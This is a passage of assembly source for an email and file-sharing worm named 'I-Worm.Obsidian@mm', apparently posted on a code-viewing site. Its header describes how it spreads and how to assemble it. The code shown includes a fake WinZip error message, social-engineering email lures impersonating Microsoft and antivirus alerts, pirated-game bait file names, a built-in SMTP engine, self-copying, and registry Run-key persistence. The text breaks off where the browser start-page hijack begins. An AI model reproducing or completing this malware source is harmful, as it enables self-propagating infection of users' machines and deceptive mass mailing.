📄 obsidian.asm
字号:
;---------------------------------------------------------------------------;
; Name: I-Worm.Obsidian@mm ;
; Author: Vorgon ;
; Size: 12288 Bytes ; ;
; ;
; Made in Canada ;
;---------------------------------------------------------------------------;
; ;
; DESCRIPTION: ;
; ;
; This is my first worm. It spreads using file sharing and email. When the ;
; worm is executed it copies itself to the c:\windows directory. It then ;
; adds itself to registery so it runs on start-up. The internet explorer ;
; start page is then changed to www.dxgaming.com. A game is then created in ;
; the c:\my downloads directory if one does not already exist. The game to ;
; be created is based on the hour giving a possible 24 games. If the worm ;
; is executed on start-up then it stays active. Every hour it will send ;
; infected emails to everyone in the windows address book. A different ;
; email is sent for every day of the week using my own SMTP engine. ;
; ; ;
; ASSEMBLING: ;
; ;
; tasm32 /ml obsidian ;
; tlink32 -aa -x /Tpe /c obsidian,obsidian,, import32.lib,, ;
; ;
; GREETZ: ;
; ;
; T00FiC, Eddow, Asmodeus, SPTH, PakBrain, Kefi, urgo32 ; ;
; ;
;---------------------------------------------------------------------------;
.386p
.MODEL flat, stdcall
extrn MessageBoxA : PROC
extrn GetCommandLineA : PROC
extrn CreateFileA : PROC
extrn ReadFile : PROC
extrn WriteFile : PROC
extrn SetFilePointer : PROC
extrn CloseHandle : PROC
extrn SetCurrentDirectoryA : PROC
extrn GetWindowsDirectoryA : PROC
extrn ExitProcess : PROC
extrn RegOpenKeyA : PROC
extrn RegSetValueExA : PROC
extrn RegQueryValueExA : PROC
extrn RegCloseKey : PROC
extrn GetSystemTime : PROC
extrn FindFirstFileA : PROC
extrn FindNextFileA : PROC
extrn FindClose : PROC
extrn Sleep : PROC
extrn lstrcpyA : PROC
extrn lstrcatA : PROC
extrn lstrlenA : PROC
extrn WSAStartup : PROC
extrn WSACleanup : PROC
extrn socket : PROC
extrn closesocket : PROC
extrn htons : PROC
extrn gethostbyname : PROC
extrn connect : PROC
extrn recv : PROC
extrn send : PROC
extrn recvfrom : PROC
extrn sendto : PROC
extrn RtlZeroMemory : PROC
extrn setsockopt : PROC
extrn CopyFileA : PROC
extrn MAPISendMail : PROC
OPEN_EXISTING equ 3
CREATE_NEW equ 1
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
FILE_SHARE_READ equ 1
FILE_SHARE_WRITE equ 2
FILE_BEGIN equ 0
HKEY_LOCAL_MACHINE equ 80000002h
HKEY_CURRENT_USER equ 80000001h
REG_SZ equ 1
TRUE equ 1
FALSE equ 0
AF_INET equ 2
SOCK_STREAM equ 1
SOCK_DGRAM equ 2
PCL_NONE equ 0
DNS_TYPE_MX equ 15
DNS_TYPE_NS equ 2
DNS_CLASS_IN equ 1
SO_RCVTIMEO equ 1006h
SO_SNDTIMEO equ 1005h
SOL_SOCKET equ 0FFFFh
SOFTWARE STRUC
FileName db 50 dup(0)
FileSize dd 0
SOFTWARE ENDS
EMAIL STRUC
From db 50 dup(0)
Subject db 50 dup(0)
Message db 100 dup(0)
AttachmentName db 20 dup(0)
EMAIL ENDS
SYSTEMTIME STRUC
wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMiliseconds dw 0
SYSTEMTIME ENDS
WIN32_FIND_DATA STRUC
FileAttributes dd 0
CreateTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0
FileSizeHigh dd 0
FileSizeLow dd 0
Reserved0 dd 0
Reserved1 dd 0
FullFileName db 260 dup(0)
AlternateFileName db 14 dup(0)
WIN32_FIND_DATA ENDS
WSA_DATA STRUC
wVersion dw 0
wHighVersion dw 0
szDescription db 257 dup(0)
szSystemStatus db 129 dup(0)
iMaxSockets dw 0
iMaxUdpDg dw 0
lpVendorInfo dd 0
WSA_DATA ENDS
SOCK_ADDRESS STRUC
sin_family dw 0
sin_port dw 0
sin_addr dd 0
sin_zero db 8 dup(0)
SOCK_ADDRESS ENDS
.DATA
szErrorTitle db 'WinZip Self-Extractor', 0
szErrorMessage db 'WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error', 0
szMaster db 'pcconfig.exe', 0
szStartPageKey db 'Software\Microsoft\Internet Explorer\Main', 0
szStartPageName db 'Start Page', 0
szStartPageValue db 'http://www.dxgaming.com', 0
szStartUpKey db 'Software\Microsoft\Windows\CurrentVersion\Run', 0
szStartUpName db 'PC-Config32', 0
szParamterA db ' -A', 0
szWabKey db 'Software\Microsoft\WAB\WAB4\Wab File Name', 0
szMyDownloads db 'c:\my downloads', 0
szSearchString db 'c:\my downloads\*.exe', 0
hFile dd 0
hKey dd 0
hFindFile dd 0
hSock dd 0
parameterA db FALSE
recordPosition dd 0
dataType dd 0
bufferSize dd 256
numberOfEmails dd 0
pointerToEmails dd 0
numberOfBytes dd 0
helo db 'HELO vorgon.com', 13, 10
szMailFrom db 'MAIL FROM: <', 0
szMailTo db 'RCPT TO: <', 0
sendData db 'DATA', 13, 10
dot db 13, 10, '.', 13, 10
endMail db 'QUIT', 13, 10
sendBuffer db 100 dup(0)
szBracket db '>', 13, 10, 0
szCrLf db 13, 10, 0
szDnsName db '168.95.1.1', 0
szFile db 'results.bin', 0
szDnsx db '61.222.188.150',0
IOTimeOut dd 0
bytes4 dd 0
; template for an email message with file attachment
emailP1 db 'MIME-Version: 1.0', 13, 10
db 'From: <', 0
emailP2 db '>', 13, 10
db 'To: <', 0
emailP3 db '>', 13, 10
db 'Subject: ', 0
emailP4 db 13, 10
db 'Content-Type: multipart/mixed; boundary=boundarystring', 13, 10, 13, 10
db 'This is a mulipart message in MIME format.', 13, 10
db '--boundarystring', 13, 10
db 'Content-Type: text/plain', 13, 10, 13, 10, 0
emailP5 db 13, 10
db '--boundarystring', 13, 10
db 'Content-Type: application; name="default.exe"', 13, 10
db 'Content-Transfer-Encoding: base64', 13, 10
db 'Content-Disposition: attachment; filename="', 0
emailP6 db '"', 13, 10, 13, 10, 0
emailP7 db 13, 10, '--boundarystring--', 13, 10, 0
softwareTable:
SOFTWARE <"Cossacks Full Version.exe", 0A87EC13h>
SOFTWARE <"Battlefield 1942 (full).exe", 0C499913h>
SOFTWARE <"Warcraft III Full.exe", 09994613h>
SOFTWARE <"Jedi Knight II.exe", 0A706C13h>
SOFTWARE <"Quake 3 Full Version.exe", 099C7A13h>
SOFTWARE <"Starcraft full.exe", 07C83013h>
SOFTWARE <"Doom 3.exe", 13D58313h>
SOFTWARE <"Tribes 2 (full).exe", 104C3513h>
SOFTWARE <"Rainbow 6 Full.exe", 07B8ED13h>
SOFTWARE <"Oni full.exe", 0A66A813h>
SOFTWARE <"White and Black.exe", 0999BB13h>
SOFTWARE <"Return to Castle Wolfenstien (Full).exe", 277C5613h>
SOFTWARE <"Command & Conquer: Generals.exe", 28F8BD13h>
SOFTWARE <"Black Hawk Down (full).exe", 048E1313h>
SOFTWARE <"The Sims: Unleashed.exe", 0A168C13h>
SOFTWARE <"Age Of Mythology.exe", 165D8E13h>
SOFTWARE <"Dark Age of Camelot.exe", 19775113h>
SOFTWARE <"Ultima Online.exe", 1F316113h>
SOFTWARE <"The Lord of the Rings.exe", 0C147F13h>
SOFTWARE <"Medel Of Honor: Allied Assault.exe", 0C147F13h>
SOFTWARE <"Grand Theft Auto 3 (full).exe", 08E07D13h>
SOFTWARE <"Unreal 2: The Awakening (full).exe", 16A71A13h>
SOFTWARE <"Unreal.exe", 0ABA1F13h>
SOFTWARE <"Master Of Orion 3.exe", 03046613h>
emailTable:
EMAIL <"alex_p@hotmail.com",\
"So much fun",\
"This game really rocks. Play it!",\
"roadrash.exe">
EMAIL <"nicolas_k@kingsnake.com",\
"I need help",\
"This game wont run properly. Does it work for you?",\
"kungfoo2.exe">
EMAIL <"james_c@norton.com",\
"Virus Alert!",\
"Win32.Kiss0Death is spreading fast. Download the protection.",\
"protect.exe">
EMAIL <"joice_z@cooking.com",\
"Taisty eh?",\
"Tell me if this makes your mouth water.",\
"yummy.exe">
EMAIL <"momoney@cibc.com",\
"Free money",\
"Run this program and you will recieve 10 dollars a week free.",\
"money.exe">
EMAIL <"msn@microsoft.com",\
"MSN Messenger Update",\
"Latest update for MSN Messenger.",\
"messenger.exe">
EMAIL <"stopspam@spammers.com",\
"SPAM protection",\
"Run the program below and you will never see spam mail again.",\
"nospam.exe">
.DATA?
buffer db 12288 dup(?)
emailMessage db 4096 dup(?)
dnsBuffer db 1000 dup(?)
szQuery db 100 dup(?)
szQuery2 db 100 dup(?)
szQueryLabels db 100 dup(?)
szSMTP db 100 dup(?)
emailAddressUNI db 68 dup(?)
emailAddressASC db 34 dup(?)
szWabValue db 256 dup(?)
szFullMaster db 256 dup(?)
time SYSTEMTIME ?
win32_find_data WIN32_FIND_DATA ?
WSAData WSA_DATA ?
SockAddress SOCK_ADDRESS ?
.CODE
Main:
;----------------------------------------------------------------------------
; Search the command line for -A
;----------------------------------------------------------------------------
; !!!!!! decrypt program in memory !!!!!!
call GetCommandLineA ; Get the command line
; search for a quote
mov ecx, 0
findParam:
inc ecx
cmp byte ptr [eax+ecx], 34
jne findParam
mov byte ptr [eax+ecx], 0 ; remove end quote
inc eax ; skip past the first quote
mov parameterA, TRUE
cmp word ptr [eax+ecx+1], 'A-' ; -A ?
jne copyFile
;----------------------------------------------------------------------------
; Copy self to the windows directory as pcconfig.exe
;----------------------------------------------------------------------------
copyFile:
; open the current program file
call CreateFileA, eax, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0
mov hFile, eax
cmp eax, -1
je addToReg
; Read the program into memory
; call ReadFile, hFile, offset buffer, 12288, offset numberOfBytes, 0
call ReadFile, hFile, offset buffer, 16384, offset numberOfBytes, 0
; close file
call CloseHandle, hFile
; !!!!!!!!!!! encrypt the virus in the buffer !!!!!!
; create the path for pcconfig.exe
call GetWindowsDirectoryA, offset szFullMaster, 256
mov byte ptr [szFullMaster+eax], '\'
call lstrcatA, offset szFullMaster, offset szMaster
; create pcconfig.exe in the windows directory
call CreateFileA, offset szFullMaster, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0
mov hFile, eax
cmp eax, -1
je addToReg
; write the program in the buffer to the file
call WriteFile, hFile, offset buffer, 16384, offset numberOfBytes, 0
; close file
call CloseHandle, hFile
;----------------------------------------------------------------------------
; Add pcconfig.exe to the registry so the program runs on start-up
;----------------------------------------------------------------------------
addToReg:
call lstrcpyA,offset szAttach, offset szFullMaster
; add -A to the path
call lstrcatA, offset szFullMaster, offset szParamterA
; open the key
call RegOpenKeyA, HKEY_LOCAL_MACHINE, offset szStartUpKey, offset hKey
cmp eax, 0
jne setStartPage
; create a value
call RegSetValueExA, hKey, offset szStartUpName, 0, REG_SZ, offset szFullMaster, 128
; close key
call RegCloseKey, hKey
;----------------------------------------------------------------------------
; Change the internet explorer start page
;----------------------------------------------------------------------------
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -